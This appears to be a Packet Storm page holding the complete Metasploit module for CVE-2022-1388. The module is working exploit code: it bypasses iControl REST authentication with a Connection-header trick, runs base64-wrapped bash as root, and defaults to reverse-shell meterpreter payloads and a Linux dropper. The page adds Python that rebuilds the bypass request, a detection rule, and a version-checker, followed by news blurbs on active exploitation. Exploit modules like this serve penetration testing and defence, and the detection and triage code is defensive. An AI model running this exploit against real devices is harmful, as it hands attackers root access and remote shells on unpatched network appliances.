F5 BIG-IP iControl Remote Code Execution

This Metasploit module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

Packet Storm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability
          in the F5 BIG-IP iControl REST service to gain access to the
          admin account, which is capable of executing commands
          through the /mgmt/tm/util/bash endpoint.
          Successful exploitation results in remote code execution
          as the root user.
        },
        'Author' => [
          'Heyder Andrade', # Metasploit module
          'alt3kx <alt3kx[at]protonmail.com>', # PoC
          'James Horseman', # Technical Writeup
          'Ron Bowes' # Documentation of exploitation specifics
        ],
        'References' => [
          ['CVE', '2022-1388'],
          ['URL', 'https://support.f5.com/csp/article/K23605346'],
          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup
          ['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2022-05-04', # Vendor advisory
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :bourne,
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
          'SideEffects' => [
            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
            ARTIFACTS_ON_DISK # CmdStager
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
        OptString.new('HttpPassword', [true, 'iControl password', ''])
      ]
    )

    register_advanced_options([
      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
    ])
  end

  # Two-step check: first confirm the iControl REST login endpoint answers the
  # way an unauthenticated client expects (401 with a REST error document), then
  # push an 'echo' probe through the bypass and look for the random marker in
  # commandResult. Only a matching marker is reported as Vulnerable.
  def check
    print_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
      'method' => 'GET'
    })
    return CheckCode::Unknown unless res&.code == 401

    body = res.get_json_document
    return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'

    signature = Rex::Text.rand_text_alpha(13)
    stub = "echo #{signature}"
    res = send_command(stub)
    return CheckCode::Safe unless res&.code == 200

    body = res.get_json_document
    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'
    return CheckCode::Vulnerable if body['commandResult'].chomp == signature

    CheckCode::Safe
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
    res = send_command(cmd)
    unless res
      print_warning('Command execution timed out')
      return
    end

    json = res.get_json_document
    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
      fail_with(Failure::PayloadFailed, 'Failed to execute command')
    end

    print_good('Successfully executed command')
    return unless (cmd_result = json['commandResult'])

    vprint_line(cmd_result)
  end

  # The bypass itself: listing X-F5-Auth-Token in the Connection header makes
  # the front-end proxy treat it as hop-by-hop and strip it before the request
  # reaches the REST backend. With Host set to localhost the backend then
  # accepts the Basic credentials for the admin user without checking the
  # password. The command is base64-wrapped so that quoting inside utilCmdArgs
  # cannot break the -c '...' argument.
  def send_command(cmd)
    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
      'ctype' => 'application/json',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'headers' => {
        'Host' => 'localhost',
        'Connection' => 'keep-alive, X-F5-Auth-Token',
        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)
      },
      'data' => {
        'command' => 'run',
        'utilCmdArgs' => "-c '#{bash_cmd}'"
      }.to_json
    }, datastore['CmdExecTimeout'])
  end
end
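The request that send_command builds and the decision that check makes, as an added Python example that is not part of the module or of the Packet Storm page. It assembles the same request shape offline, decodes the base64-wrapped command back out of a captured utilCmdArgs value (the reverse of what the module does, which is what an incident responder needs when the request turns up in a log), mirrors the check method's response classification, and runs a detection rule over constructed request records. The hostnames, the token value and the sample traffic are constructed for illustration; the detection rule rests on the mechanism the module relies on, a Connection header naming X-F5-Auth-Token causing the front end to drop that header before the REST backend sees the request.

```python
"""Added example, not part of the Packet Storm page or the Metasploit module.
All data here is constructed; nothing is sent to a device."""
import base64
import json
import re


def build_bypass_request(command, username="admin", password=""):
    """Raw HTTP/1.1 request with the same shape the module's send_command uses.
    Naming X-F5-Auth-Token in Connection marks it hop-by-hop so the front end
    drops it; the REST backend then falls back to the Basic credentials."""
    b64 = base64.b64encode(command.encode()).decode()
    body = json.dumps({"command": "run",
                       "utilCmdArgs": f"-c 'eval $(echo {b64} | base64 -d)'"})
    creds = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = [
        ("Host", "localhost"),
        ("Authorization", f"Basic {creds}"),
        ("Connection", "keep-alive, X-F5-Auth-Token"),
        ("X-F5-Auth-Token", "abcdef"),  # placeholder value; the module randomises it
        ("Content-Type", "application/json"),
        ("Content-Length", str(len(body))),
    ]
    head = ["POST /mgmt/tm/util/bash HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(head) + "\r\n\r\n" + body


_B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d")


def decode_util_cmd_args(util_cmd_args):
    """Recover the original command from the eval/base64 wrapper (IR use)."""
    m = _B64_RE.search(util_cmd_args)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode(errors="replace")


def classify_check_response(status, body_text, signature):
    """Same decision the module's check makes on the echo probe reply:
    200, kind tm:util:bash:runstate, and commandResult equal to the marker."""
    if status != 200:
        return "safe"
    try:
        body = json.loads(body_text)
    except ValueError:
        return "safe"
    if body.get("kind") != "tm:util:bash:runstate":
        return "safe"
    return "vulnerable" if body.get("commandResult", "").rstrip("\n") == signature else "safe"


def parse_http_request(raw):
    """Minimal HTTP/1.1 request parser for the constructed records below."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def is_bypass_attempt(req):
    """Detection rule: a request under /mgmt/ whose Connection header lists
    X-F5-Auth-Token. Legitimate clients never declare that header hop-by-hop."""
    conn = req["headers"].get("connection", "")
    tokens = {t.strip().lower() for t in conn.split(",")}
    return req["path"].startswith("/mgmt/") and "x-f5-auth-token" in tokens


# Constructed sample traffic: one exploit attempt, one token-authenticated call,
# and the unauthenticated login probe the module's check sends first.
SAMPLE_REQUESTS = [
    build_bypass_request("id"),
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example.test\r\n"
    "X-F5-Auth-Token: ABCDEF\r\n\r\n",
    "GET /mgmt/shared/authn/login HTTP/1.1\r\nHost: bigip.example.test\r\n\r\n",
]


def flagged_requests(raws=SAMPLE_REQUESTS):
    """Return (method, path, decoded command or None) for each flagged request."""
    hits = []
    for raw in raws:
        req = parse_http_request(raw)
        if not is_bypass_attempt(req):
            continue
        command = None
        try:
            command = decode_util_cmd_args(json.loads(req["body"]).get("utilCmdArgs", ""))
        except ValueError:
            pass
        hits.append((req["method"], req["path"], command))
    return hits
```

Running flagged_requests() over the constructed sample flags only the POST to /mgmt/tm/util/bash and reports the decoded command ("id"); the token-authenticated GET and the login probe pass. The rule keys on the Connection header rather than on the endpoint because the same trick works against other iControl REST endpoints, so a detection tied to /mgmt/tm/util/bash alone would miss reconnaissance that never runs a command.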

Related news

U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

3 Flaws, 1 War Dominated Cyber-Threat Landscape in 2022

Attackers continued to favor software exploits, phishing, and stolen credentials as initial-access methods last year, as Log4j and the Russia-Ukraine cyber conflict changed the threat landscape.

Joint Advisory AA22-279A and Vulristics

Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, Joint cybersecurity advisory (CSA) AA22-279A, and how I analyzed these vulnerabilities using my open source project Vulristics. Alternative video link (for Russia): https://vk.com/video-149273431_456239105 Americans can’t just release a list of “20 vulnerabilities most commonly exploited in attacks on […]

Chinese APT's favorite vulnerabilities revealed

CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsored threat actors from China. The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.

Vulnerability Exploits, Not Phishing, Are the Top Cyberattack Vector for Initial Compromise

A slew of Microsoft Exchange vulnerabilities (including ProxyLogon) fueled a surge in attacks targeting software flaws in 2021, but the trend has continued this year.

Attackers Have 'Favorite' Vulnerabilities to Exploit

While attackers continue to rely on older, unpatched vulnerabilities, many are jumping on new vulnerabilities as soon as they are disclosed.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services

Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire

By Jon Munshaw.  Welcome to this week’s edition of the Threat Source newsletter.  I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I...

VMware Releases Patches for New Vulnerabilities Affecting Multiple Products

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior

CISA: Unpatched F5 BIG-IP Devices Under Active Attack

Publicly released proof-of-concept exploits are supercharging attacks against unpatched systems, CISA warns.

F5 BIG-IP vulnerability is now being used to disable servers

At least one group of threat actors is using the recently patched vulnerability in F5 BIG-IP to wipe the file system of vulnerable devices. The post F5 BIG-IP vulnerability is now being used to disable servers appeared first on Malwarebytes Labs.

CISA Urges Organizations to Patch Actively Exploited F5 BIG-IP Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the recently disclosed F5 BIG-IP flaw to its Known Exploited Vulnerabilities Catalog following reports of active abuse in the wild. The flaw, assigned the identifier CVE-2022-1388 (CVSS score: 9.8), concerns a critical bug in the BIG-IP iControl REST endpoint that provides an unauthenticated adversary with a method to

Threat Advisory: Critical F5 BIG-IP Vulnerability

Summary A recently disclosed vulnerability in F5 Networks' BIG-IP could allow an unauthenticated attacker to access the BIG-IP system to execute arbitrary system commands, create and delete files, disable services and could lead to additional malicious activity. This vulnerability, tracked as...

Hackers Actively Exploit F5 BIG-IP Bug

The bug has a severe rating of 9.8, public exploits are released.

How to Check if Your F5 BIG-IP Device Is Vulnerable

This Tech Tip walks network administrators through the steps to address the latest critical remote code execution vulnerability (CVE-2022-1388) in F5's BIG-IP management interface.

F5 BIG-IP Remote Code Execution

F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388.

Update now! F5 BIG-IP vulnerability being actively exploited

Only a few days after the release of the patch for a vulnerability in F5 BIG-IP, exploits were developed and are now being deployed. The post Update now! F5 BIG-IP vulnerability being actively exploited appeared first on Malwarebytes Labs.

CVE-2022-1388

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
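The affected ranges in the CVE text, turned into a check that can be run against the output of `tmsh show sys version`. This is an added example, not from F5 or from the CVE record; the sample output lines are constructed, and a branch the text does not name (an EoTS branch, for instance) is reported as not evaluated rather than as safe, because the record itself makes no claim about it.

```python
"""Added example, not from the CVE record or F5: maps the affected ranges stated
in the CVE text onto a version check. Sample lines are constructed."""
import re

# First fixed version per branch, as given in the CVE text; None means the
# text lists every version on that branch as affected.
FIXED_BY_BRANCH = {
    (16, 1): (16, 1, 2, 2),
    (15, 1): (15, 1, 5, 1),
    (14, 1): (14, 1, 4, 6),
    (13, 1): (13, 1, 5),
    (12, 1): None,
    (11, 6): None,
}

_VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)")


def parse_version(text):
    """Pull the dotted version out of a bare string such as '16.1.2.1' or a
    'Version  16.1.2.1' line and return it as a tuple of ints."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(text):
    """True if the version falls in an affected range, False if it is at or
    past the fix, None if the CVE text says nothing about that branch."""
    version = parse_version(text)
    branch = version[:2]
    if branch not in FIXED_BY_BRANCH:
        return None
    fixed = FIXED_BY_BRANCH[branch]
    if fixed is None:
        return True
    # Tuple comparison handles the three-part 13.1.5 boundary correctly:
    # (13, 1, 4, 1) < (13, 1, 5) and (13, 1, 5, 1) > (13, 1, 5).
    return version < fixed


# Constructed tmsh-style output lines with the verdict the CVE text implies.
SAMPLE_OUTPUT = [
    ("Version  16.1.2.1", True),
    ("Version  16.1.2.2", False),
    ("Version  15.1.5.1", False),
    ("Version  14.1.4.5", True),
    ("Version  13.1.4.1", True),
    ("Version  13.1.5.1", False),
    ("Version  12.1.6", True),
    ("Version  11.5.4", None),   # branch not named in the CVE text
]


def triage(lines=SAMPLE_OUTPUT):
    """Return (line, verdict) pairs; verdict is True, False or None as above."""
    return [(line, is_affected(line)) for line, _ in lines]
```

A None verdict is the honest answer for anything outside the listed branches: the record says EoTS versions were not evaluated, which is not the same as saying they are unaffected, so a scanner that mapped "not listed" to "safe" would quietly clear exactly the devices least likely to ever be patched.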
